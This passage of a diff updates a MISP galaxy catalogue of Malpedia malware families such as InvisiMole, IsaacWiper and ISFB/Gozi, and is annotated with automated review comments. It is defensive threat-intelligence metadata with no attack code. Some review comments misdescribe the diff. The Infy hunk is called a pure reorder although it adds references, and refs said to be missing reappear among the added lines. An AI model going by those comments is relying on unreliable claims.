"http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://cloud.tencent.com/developer/article/1738806"
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
+ "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
+ "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/",
+ "https://cloud.tencent.com/developer/article/1738806",
+ "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
+ "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/"
],
"synonyms": [
"Foudre"
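Review bot: this Infy hunk is a pure reorder, but it leaves the same Unit 42 post listed under both `http://` and `https://` (`researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/`); normalising the scheme during dedupe would drop one of them. No functional change otherwise.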
@@ -27405,6 +29000,19 @@
"uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
"value": "Infy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.inlock",
+ "https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3071e2d4-c692-4054-a7bf-db9af6fe3b63",
+ "value": "Inlock"
+ },
{
"description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.",
"meta": {
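Review bot: the new Inlock entry has an empty `description` even though its only non-Malpedia ref (the Fortinet ransomware roundup) identifies the family; as with INCONTROLLER, pull the Malpedia description through so the cluster is not a bare name. UUID and alphabetical placement between Infy and InnaputRAT look right.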
@@ -27442,33 +29050,25 @@
"type": []
},
"uuid": "fa022849-248c-4620-86b4-2a36c704b288",
- "value": "Interception"
+ "value": "Interception (Windows)"
},
{
"description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/",
+ "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
+ "https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf",
- "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "10f50ef8-6e3b-11e8-a648-d73fb4d2f48e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
"value": "InvisiMole"
},
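Review bot: two changes in this hunk need a deliberate decision rather than a silent sync. First, `Interception` is renamed to `Interception (Windows)` on the same UUID; the cluster value is what ends up in `misp-galaxy:malpedia="..."` tags, so events already tagged with the old value will no longer resolve. If the rename is intentional, add the old value to `synonyms` so existing tags keep matching. Second, the whole `related` block on InvisiMole (the `similar` link to `10f50ef8-6e3b-11e8-a648-d73fb4d2f48e`) is dropped; that cross-reference is maintained in the galaxy, not in Malpedia, and it should survive a refresh unless it was removed on purpose. The ref shuffling in the same hunk adds only the cocomelonc post.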
@@ -27491,8 +29091,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
"https://www.symantec.com/security-center/writeup/2015-122210-5128-99",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
"https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html",
"https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
],
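Review bot: reorder only for IRONHALO (the SlideShare ref moves below the Symantec write-up); no content change.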
@@ -27502,34 +29102,50 @@
"uuid": "44599616-3849-4960-9379-05307287ff80",
"value": "IRONHALO"
},
+ {
+ "description": "According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironnetinjector",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5ec639ab-f6c1-4cbb-87b1-d59344878e98",
+ "value": "IronNetInjector"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper",
"https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
"https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/",
- "https://twitter.com/ESETresearch/status/1521910890072842240",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
"https://experience.mandiant.com/trending-evil-2/p/1",
"https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://twitter.com/ESETresearch/status/1521910890072842240",
+ "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
"https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
],
"synonyms": [
"LASAINRAW"
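Review bot: the IronNetInjector description opens with "According to Mitre" but the `refs` list only Malpedia and the Unit 42 post; if MITRE is the source of that wording, the corresponding ATT&CK software page should be among the refs, otherwise reword the description so it does not cite a source the entry does not link. In the IsaacWiper part of the hunk the msrc-blog post is again listed with and without a trailing slash (lines `.../analysis-resources-cyber-threat-activity-ukraine` and `.../analysis-resources-cyber-threat-activity-ukraine/`), and the two Trustwave variants survive the reorder, so the same trailing-slash normalisation applies here.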
@@ -27544,93 +29160,100 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
- "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
- "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
- "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
- "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
- "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
- "https://www.youtube.com/watch?v=KvOpNznu_3w",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
- "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass",
- "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "http://benkow.cc/DreambotSAS19.pdf",
- "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
+ "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
+ "https://blog.group-ib.com/gozi-latest-ttps",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
+ "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
+ "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
+ "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
+ "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
+ "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
+ "https://www.youtube.com/watch?v=KvOpNznu_3w",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
+ "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
+ "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
+ "http://benkow.cc/DreambotSAS19.pdf",
+ "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
+ "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.cyberbit.com/new-ursnif-malware-variant/",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
"https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
"https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
- "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
- "https://lokalhost.pl/gozi_tree.txt",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://blog.group-ib.com/gozi-latest-ttps",
- "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
- "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
- "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
- "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
- "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.cyberbit.com/new-ursnif-malware-variant/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware",
- "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
- "https://github.com/mlodic/ursnif_beacon_decryptor",
- "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware"
],
"synonyms": [
"Gozi ISFB",
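Review bot: Most of this hunk is reordering rather than content change, which makes the real additions and removals hard to audit: the same URL is dropped and re-added (for example `- "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work"` and `+ "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work"`), and the new order is neither alphabetical nor the previous order, so the generator appears to write refs in set or dict iteration order. Sorting refs before serialising the JSON would make future diffs show only genuine changes. Separately, several removed refs (lokalhost.pl/gozi_tree.txt, github.com/mlodic/ursnif_beacon_decryptor, the two isc.sans.edu diaries, the Darktrace and Group-IB posts) do not reappear among the added lines visible here; since the top of this hunk is cut off, please confirm those are intentional upstream removals rather than a generator regression.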
@@ -27647,11 +29270,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
+ "http://www.clearskysec.com/ismagent/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "http://www.clearskysec.com/ismagent/"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -27664,11 +29287,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
"http://www.clearskysec.com/greenbug/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
],
"synonyms": [],
"type": []
@@ -27695,8 +29318,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye",
